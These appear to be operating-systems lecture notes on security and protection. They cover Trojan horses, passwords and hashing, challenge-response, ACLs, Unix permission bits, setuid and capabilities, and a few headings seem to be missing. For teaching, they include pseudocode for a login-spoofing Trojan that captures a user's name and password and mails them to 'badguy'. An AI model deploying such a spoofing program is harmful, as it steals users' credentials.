The terms protection and security are often used together, and the distinction between them is a bit blurred, but security is generally used in a broad sense to refer to all concerns about controlled access to facilities, while protection describes specific technological mechanisms that support security.
As in any other area of software design, it is important to distinguish between policies and mechanisms. Before you can start building machinery to enforce policies, you need to establish what policies you are trying to enforce. Many years ago, I heard a story about a software firm that was hired by a small savings and loan corporation to build a financial accounting system. The chief financial officer used the system to embezzle millions of dollars and fled the country. The losses were so great that the S&L went bankrupt, and the loss of the contract was so bad that the software company also went belly-up. Did the accounting system have a good or bad security design? The problem wasn't unauthorized access to information, but rather authorization granted to the wrong person. The situation is analogous to the old saw that every program is correct according to some specification. Unfortunately, we don't have the space to go into the whole question of security policies here. We will just assume that terms like “authorized access” have some well-defined meaning in a particular context.
In response to these threats, countermeasures also fall into various categories. As programmers, we tend to think of technological tricks, but it is also important to realize that a complete security design must involve physical components (such as locking the computer in a secure building with armed guards outside) and human components (such as a background check to make sure your CFO isn't a crook, or checking to make sure those armed guards aren't taking bribes).
Break-in techniques come in numerous forms. One general category of attack that comes in a great variety of disguises is the Trojan Horse scam. The name comes from Greek mythology. The ancient Greeks were attacking the city of Troy, which was surrounded by an impenetrable wall. Unable to get in, they left a huge wooden horse outside the gates as a “gift” and pretended to sail away. The Trojans brought the horse into the city, where they discovered that the horse was filled with Greek soldiers who defeated the Trojans to win the Rose Bowl (oops, wrong story). In software, a Trojan Horse is a program that does something useful--or at least appears to do something useful--but also subverts security somehow. In the personal computer world, Trojan horses are often computer games infected with “viruses.”
Here's the simplest Trojan Horse program I know of. Log onto a public terminal and start a program that does something like this:
print("login:"); name = readALine(); turnOffEchoing(); print("password:"); passwd = readALine(); sendMail("badguy",name,passwd); print("login incorrect"); exit();A user waking up to the terminal will think it is idle. He will attempt to log in, typing his login name and password. The Trojan Horse program sends this information to the bad guy, prints the message login incorrect and exits. After the program exits, the system will generate a legitimate login: message and the user, thinking he mistyped his password (a common occurrence because the password is not echoed) will try again, log in successfully, and have no suspicion that anything was wrong. Note that the Trojan Horse program doesn't actually have to do anything useful, it just has to appear to.
Authentication is a process by which one party convinces another of its identity. A familiar instance is the login process, through which a human user convinces the computer system that he has the right to use a particular account. If the login is successful, the system creates a process and associates with it the internal identifier that identifies the account. Authentication occurs in other contexts, and it isn't always a human being that is being authenticated. Sometimes a process needs to authenticate itself to another process. In a networking environment, a computer may need to authenticate itself to another computer. In general, let's call the party that wants to be authenticated the client and the other party the server.
One common technique for authentication is the use of a password. This is the technique used most often for login. There is a value, called the password, that is known both to the server and to legitimate clients. The client tells the server who he claims to be and supplies the password as proof. The server compares the supplied password with what he knows to be the true password for that user.
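To make the mechanics concrete, here is a minimal sketch of the server-side check under this scheme; the function name is made up, and the idea of keeping the password itself on file is exactly the weakness discussed below.

#include <string.h>

/* Naive sketch: the server keeps a copy of the password itself and
 * accepts the client if the typed string matches it exactly. */
int passwordMatches(const char *typed, const char *stored) {
    return strcmp(typed, stored) == 0;   /* 1 = accept, 0 = reject */
}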
Although this is a common technique, it is not a very good one. There are lots of things wrong with it.
The most obvious way of breaking in is a frontal assault on the password. Simply try all possible passwords until one works. The main defense against this attack is the time it takes to try lots of possibilities. If the client is a computer program (perhaps masquerading as a human being), it can try lots of combinations very quickly, but if the password is long enough, even the fastest computer cannot succeed in a reasonable amount of time. If the password is a string of 8 letters and digits, there are 2,821,109,907,456 possibilities. A program that tried one combination every millisecond would take 89 years to get through them all. If users are allowed to pick their own passwords, they are likely to choose “cute doggie names”, common words, names of family members, etc. That cuts down the search space considerably. A password cracker can go through dictionaries, lists of common names, etc. It can also use biographical information about the user to narrow the search space. There are several defenses against this sort of attack.
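The figures above are easy to reproduce; here is a quick sketch of the arithmetic, assuming a single case of letters, so 26 letters plus 10 digits per position.

#include <stdio.h>

int main(void) {
    /* 8 positions, each with 26 letters + 10 digits = 36 choices */
    double combinations = 1.0;
    for (int i = 0; i < 8; i++)
        combinations *= 36.0;

    double seconds = combinations / 1000.0;           /* one guess per millisecond */
    double years = seconds / (365.0 * 24 * 60 * 60);

    printf("combinations: %.0f\n", combinations);     /* 2821109907456 */
    printf("years to try them all: %.0f\n", years);   /* about 89 */
    return 0;
}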
This is a far bigger problem for passwords than brute-force attacks. It comes in many disguises.
Unix introduced a clever fix to this problem that has since been almost universally copied. Use some hash function f and, instead of storing password, store f(password). The hash function should have two properties: Like any hash function, it should generate all possible result values with roughly equal probability, and in addition, it should be very hard to invert--that is, given f(password), it should be hard to recover password. It is quite easy to devise functions with these properties. When a client sends his password, the server applies f to it and compares the result with the value stored in the password file. Since only f(password) is stored in the password file, nobody can find out the password for a given user, even with full access to the password file, and logging in requires knowing password, not f(password). In fact, this technique is so secure, it has become customary to make the password file publicly readable!
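Here is a minimal sketch of the idea, using the traditional Unix crypt(3) routine to play the role of f (it is declared in <unistd.h> or <crypt.h>, depending on the system, and the program must be linked with -lcrypt). Modern systems use stronger, salted hash functions, but the structure is the same.

#define _XOPEN_SOURCE
#include <string.h>
#include <unistd.h>   /* crypt(3) */

/* The password file stores only storedHash = f(password).
 * crypt() takes its salt from the stored hash itself, so applying it to
 * the typed password reproduces f(typed), which we compare to the file. */
int passwordMatches(const char *typed, const char *storedHash) {
    const char *h = crypt(typed, storedHash);
    return h != NULL && strcmp(h, storedHash) == 0;
}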
This is the worst threat of all. How does the client know that the server is who it appears to be? If the bad guy can pose as the server, he can trick the client into divulging his password. We saw a form of this attack above. It would seem that the server needs to authenticate itself to the client before the client can authenticate itself to the server. Clearly, there's a chicken-and-egg problem here. Fortunately, there's a very clever and general solution to this problem.
Challenge-response.
There is a wide variety of authentication protocols, but they are all based on a simple idea. As before, we assume that there is a password known to both the (true) client and the (true) server. Authentication is a four-step process.
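Here is a sketch of one common form of the exchange; the respond() mixing function below is only a stand-in for a real cryptographic function, and all the names are made up for illustration. The server sends a fresh random challenge, the client answers with a function of the challenge and the password, and the server checks the answer by computing the same function itself, so the password never crosses the wire.

#include <stdio.h>
#include <stdlib.h>

/* Stand-in for a one-way function of challenge and password.
 * A real protocol would use a cryptographic MAC here. */
static unsigned long respond(unsigned long challenge, const char *password) {
    unsigned long h = challenge;
    for (const char *p = password; *p != '\0'; p++)
        h = h * 31 + (unsigned char)*p;
    return h;
}

int main(void) {
    const char *sharedPassword = "tiger123";   /* known to client and server */

    /* Server: pick a fresh challenge and send it to the client.
     * (A real server would use a cryptographically strong random source.) */
    unsigned long challenge = (unsigned long)rand();

    /* Client: prove knowledge of the password without transmitting it. */
    unsigned long clientResponse = respond(challenge, sharedPassword);

    /* Server: compute the expected response and compare. */
    int ok = (clientResponse == respond(challenge, sharedPassword));
    printf("authenticated: %s\n", ok ? "yes" : "no");
    return 0;
}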
First, some terminology:
access[solomon]["/tmp/foo"] = { read, write }

Then I have read and write access to file "/tmp/foo". I say “conceptually” because the access matrix is never actually stored anywhere. It is very large and has a great deal of redundancy (for example, my rights to a vast number of objects are exactly the same: none!), so there are much more compact ways to represent it. The access information is represented in one of two ways: by columns, which are called access control lists (ACLs), and by rows, called capability lists.
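A sketch of the two representations in code (the type and field names are illustrative only): slicing the matrix by columns attaches to each object a list of (principal, rights) pairs, its ACL, while slicing it by rows attaches to each principal a list of (object, rights) pairs, its capability list.

/* Rights encoded as a small bit set. */
enum { R_READ = 1, R_WRITE = 2, R_EXECUTE = 4 };

/* Column view: each object carries its ACL, a list of entries
 * naming a principal and that principal's rights to the object. */
struct aclEntry { const char *principal; int rights; };
struct object   { const char *name; struct aclEntry *acl; int aclLen; };

/* Row view: each principal carries a capability list, a list of
 * entries naming an object and the rights held over it. */
struct capability { struct object *obj; int rights; };
struct principal  { const char *name; struct capability *caps; int capLen; };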
An ACL (pronounced “ackle”) is a list of rights associated with an object. A good example of the use of ACLs is the Andrew File System (AFS) originally created at Carnegie-Mellon University and now marketed by Transarc Corporation as an add-on to Unix. This file system is widely used in the Computer Sciences Department. Your home directory is in AFS. AFS associates an ACL with each directory, but the ACL also defines the rights for all the files in the directory (in effect, they all share the same ACL). You can list the ACL of a directory with the fs listacl command:
% fs listacl /u/c/s/cs537-1/public
Access list for /u/c/s/cs537-1/public is
Normal rights:
  system:administrators rlidwka
  system:anyuser rl
  solomon rlidwka

The entry system:anyuser rl means that the principal system:anyuser (which represents the role “anybody at all”) has rights r (read files in the directory) and l (list the files in the directory and read their attributes). The entry solomon rlidwka means that I have all seven rights supported by AFS. In addition to r and l, they include the rights to insert new files in the directory (i.e., create files), delete files, write files, lock files, and administer the ACL itself. This last right is very powerful: It allows me to add, delete, or modify ACL entries. I thus have the power to grant or deny any rights to this directory to anybody. The remaining entry in the list shows that the principal system:administrators has the same rights I do (namely, all rights). This principal is the name of a group of other principals. The command pts membership system:administrators lists the members of the group.
Ordinary Unix also uses an ACL scheme to control access to files, but in a much stripped-down form. Each process is associated with a user identifier (uid) and a group identifier (gid), each of which is a 16-bit unsigned integer. The inode of each file also contains a uid and a gid, as well as a nine-bit protection mask, called the mode of the file. The mask is composed of three groups of three bits. The first group indicates the rights of the owner: one bit each for read access, write access, and execute access (the right to run the file as a program). The second group similarly lists the rights of the file's group, and the remaining three bits indicate the rights of everybody else. For example, the mode 111 101 101 (0755 in octal) means that the owner can read, write, and execute the file, while members of the owning group and others can read and execute, but not write the file. Programs that print the mode usually use the characters rwx- rather than 0 and 1. Each zero in the binary value is represented by a dash, and each 1 is represented by r, w, or x, depending on its position. For example, the mode 111101101 is printed as rwxr-xr-x.
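A small sketch of the conversion just described, printing a nine-bit mode in the usual notation (0755 comes out as rwxr-xr-x):

#include <stdio.h>

/* Print a nine-bit mode: each 1 bit as r, w, or x according to its
 * position, each 0 bit as a dash. */
void printMode(int mode) {
    const char symbols[] = "rwxrwxrwx";
    char out[10];
    for (int i = 0; i < 9; i++)
        out[i] = (mode & (1 << (8 - i))) ? symbols[i] : '-';
    out[9] = '\0';
    printf("%s\n", out);
}

int main(void) {
    printMode(0755);   /* rwxr-xr-x */
    printMode(0046);   /* ---r--rw-  (the odd mode discussed below) */
    return 0;
}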
In somewhat more detail, the access-checking algorithm is as follows: The first three bits are checked to determine whether an operation is allowed if the uid of the file matches the uid of the process trying to access it. Otherwise, if the gid of the file matches the gid of the process, the second three bits are checked. If neither of the id's match, the last three bits are used. The code might look something like this.
boolean accessOK(Process p, Inode i, int operation) {
    int mode;
    if (p.uid == i.uid)
        mode = i.mode >> 6;      // owner rights: high three bits
    else if (p.gid == i.gid)
        mode = i.mode >> 3;      // group rights: middle three bits
    else
        mode = i.mode;           // rights for everybody else
    switch (operation) {
        case READ:    mode &= 4; break;
        case WRITE:   mode &= 2; break;
        case EXECUTE: mode &= 1; break;
    }
    return (mode != 0);
}

(The expression i.mode >> 3 denotes the value i.mode shifted right by three bit positions, and the operation mode &= 4 clears all but the third bit from the right of mode.) Note that this scheme can actually give a random user more power over the file than its owner. For example, the mode ---r--rw- (000 100 110 in binary) means that the owner cannot access the file at all, while members of the group can only read the file, and others can both read and write. On the other hand, the owner of the file (and only the owner) can execute the chmod system call, which changes the mode bits to any desired value. When a new file is created, it gets the uid and gid of the process that created it, and a mode supplied as an argument to the creat system call.
Most modern versions of Unix actually implement a slightly more flexible scheme for groups. A process has a set of gid's, and the check for group access tests whether any of the process' gid's match the file's gid.
boolean accessOK(Process p, Inode i, int operation) {
    int mode;
    if (p.uid == i.uid)
        mode = i.mode >> 6;
    else if (p.gidSet.contains(i.gid))   // any of the process's gids may match
        mode = i.mode >> 3;
    else
        mode = i.mode;
    switch (operation) {
        case READ:    mode &= 4; break;
        case WRITE:   mode &= 2; break;
        case EXECUTE: mode &= 1; break;
    }
    return (mode != 0);
}

When a new file is created, it gets the uid of the process that created it and the gid of the containing directory. There are system calls to change the uid or gid of a file. For obvious security reasons, these operations are highly restricted. Some versions of Unix only allow the owner of the file to change its gid, only allow him to change it to one of his gid's, and don't allow him to change the uid at all.
For directories, “execute” permission is interpreted as the right to get the attributes of files in the directory. Write permission is required to create or delete files in the directory. This rule leads to the surprising result that you might not have permission to modify a file, yet be able to delete it and replace it with another file of the same name but with different contents!
Unix has another very clever feature--so clever that it is patented! The file mode actually has a few more bits that I have not mentioned. One of them is the so-called setuid bit. If a process executes a program stored in a file with the setuid bit set, the uid of the process is set equal to the uid of the file. This rather curious rule turns out to be a very powerful feature, allowing the simple rwx permissions directly supported by Unix to be used to define arbitrarily complicated protection policies.
As an example, suppose you wanted to implement a mail system that works by putting all mail messages into one big file, say /usr/spool/mbox. I should be able to read only those messages that mention me in the To: or Cc: fields of the header. Here's how to use the setuid feature to implement this policy. Define a new uid mail, make it the owner of /usr/spool/mbox, and set the mode of the file to rw------- (i.e., the owner mail can read and write the file, but nobody else has any access to it). Write a program for reading mail, say /usr/bin/readmail. This file is also owned by mail and has mode srwxr-xr-x. The ‘s’ means that the setuid bit is set. My process can execute this program (because the “execute by anybody” bit is on), and when it does, it suddenly changes its uid to mail so that it has complete access to /usr/spool/mbox. At first glance, it would seem that letting my process pretend to be owned by another user would be a big security hole, but it isn't, because processes don't have free will. They can only do what the program tells them to do. While my process is running readmail, it is following instructions written by the designer of the mail system, so it is safe to let it have access appropriate to the mail system. There's one more feature that helps readmail do its job. A process really has two uid's, called the effective uid and the real uid. When a process executes a setuid program, its effective uid changes to the uid of the program, but its real uid remains unchanged. It is the effective uid that is used to determine what rights it has to what files, but there is a system call to find out the real uid of the current process. Readmail can use this system call to find out what user called it, and then show only the appropriate messages.
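Here is a sketch of the system calls involved, getuid and geteuid; the mail-specific behavior is only described in a comment, since the readmail program itself is hypothetical.

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

int main(void) {
    uid_t realUid = getuid();        /* the user who actually ran the program */
    uid_t effectiveUid = geteuid();  /* the owner of the setuid file, e.g. mail */

    printf("real uid %d, effective uid %d\n", (int)realUid, (int)effectiveUid);

    /* A readmail-like program would open the mailbox using the rights of
     * its effective uid, then show only the messages addressed to the
     * user identified by the real uid. */
    return 0;
}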
An alternative to ACLs is capabilities. A capability is a “protected pointer” to an object. It designates an object and also contains a set of permitted operations on the object. For example, one capability may permit reading from a particular file, while another allows both reading and writing. To perform an operation on an object, a process makes a system call, presenting a capability that points to the object and permits the desired operation. For capabilities to work as a protection mechanism, the system has to ensure that processes cannot mess with their contents. There are three distinct ways to ensure the integrity of a capability.
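As one illustration (a sketch only, with invented names, and assuming the arrangement in which the kernel keeps each process's capabilities in a table that user code can name only by index), the check made on each operation might look like this:

/* A capability is a protected pointer: it designates an object and
 * records which operations on that object it permits. */
enum { OP_READ = 1, OP_WRITE = 2 };

struct object     { const char *name; };
struct capability { struct object *obj; int rights; };

/* The kernel keeps the table; user code refers to capabilities only by
 * index, so it can never alter their contents. */
struct capTable { struct capability caps[16]; int count; };

/* Check made by a system call before performing an operation. */
int capCheck(const struct capTable *t, int index, int operation) {
    if (index < 0 || index >= t->count)
        return 0;
    return (t->caps[index].rights & operation) == operation;
}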